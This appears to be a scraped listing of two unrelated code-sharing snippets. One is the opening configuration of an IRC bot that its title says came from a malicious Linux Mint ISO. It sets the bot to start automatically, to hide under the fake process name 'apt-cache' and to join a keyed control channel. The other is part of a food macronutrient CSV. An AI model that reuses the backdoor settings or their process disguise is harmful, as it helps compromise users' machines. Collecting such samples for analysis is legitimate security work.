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kurobeats /
Created February 21, 2016 09:00 from malicious Linux Mint iso
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
anonymous / MacronutrientData.csv
Created April 20, 2016 19:50
We can't make this file beautiful and searchable because it's too large.
"Abiyuch, raw",114.0,0.5 cup,1.5,g,1.71,0.1,g,0.11,17.6,g,20.06
"Acerola juice, raw",242.0,1.0 cup,0.4,g,0.97,0.3,g,0.73,4.8,g,11.62
"Acerola, (west indian cherry), raw",98.0,1.0 cup,0.4,g,0.39,0.3,g,0.29,7.69,g,7.54
"Alcoholic beverage, beer, light",29.5,1.0 fl oz,0.24,g,0.07,0.0,g,0.00,1.64,g,0.48
"Alcoholic beverage, beer, light, BUD LIGHT",29.5,1.0 fl oz,0.25,g,0.07,0.0,g,0.00,1.3,g,0.38
"Alcoholic beverage, beer, light, BUDWEISER SELECT",29.5,1.0 fl oz,0.2,g,0.06,0.0,g,0.00,0.87,g,0.26
"Alcoholic beverage, beer, light, higher alcohol",356.0,12.0 fl oz,0.25,g,0.89,0.0,g,0.00,0.77,g,2.74
"Alcoholic beverage, beer, light, low carb",29.5,1.0 fl oz,0.17,g,0.05,0.0,g,0.00,0.73,g,0.22
"Alcoholic beverage, beer, regular, all",29.7,1.0 fl oz,0.46,g,0.14,0.0,g,0.00,3.55,g,1.05